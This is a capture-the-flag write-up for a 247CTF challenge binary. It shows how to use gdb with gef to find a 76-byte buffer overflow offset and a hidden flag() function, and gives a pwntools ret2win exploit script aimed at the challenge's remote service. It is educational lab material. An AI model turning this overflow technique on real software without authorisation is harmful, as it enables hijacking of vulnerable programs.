Let's run it and see what we get  Just takes some input. Lets use **gdb** (with **gef**) to analyze the binary. First, find the function `info functions`  So the function we want is at `0x08048576` Next, find the offset 1. Create a pattern `pattern create 100` 2. Send that to the program by first running it with **r** Nice! We get a **segfault**  **gdb** is telling us that the segfault is at `0x61616174`. Let's use that as our pattern search parameter to find the offset `pattern search 0x61616174`  There's our offset! **76** We can test this by using **pi** in **gef** and sending the output into the program. `pi print('A'*76 + 'B'*4)`  If all goes well, it should fill the buffer with **41** and overwrite the instruction pointer with `0x424242` *(A = 41, B = 42)*  Cool, so we control the instruction pointer now. Now that we know the **offset** and the **function address**, we can write an exploit. Here's my code: ```Python #importing the pwntools library from pwn import * #creating the process io = process('./hidden_flag_function') #creating the connection to the server #io = remote('1e9f746024b2e701.247ctf.com', 50254) #setting the padding and function location variables padding = b'A' * 76 funcloc = 0x08048576 #attaching the process to GDB for debugging gdb.attach(io) #recieving one line io.recvline() #sending the payload io.sendline(padding + p32(funcloc)) #recieving 3 lines print(io.recvline()) print(io.recvline()) print(io.recvline()) ```  Looks good! Looks like we called the `flag()` function which then called `fgets()` and it broke. Let's fire it at the service by uncommenting the `io = remote()` line, and commenting out the `gdb.attach(io)` and `io = process()` lines  --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #buffer_overflow #exploit_development #pwn #scripting #gdb #gef Related: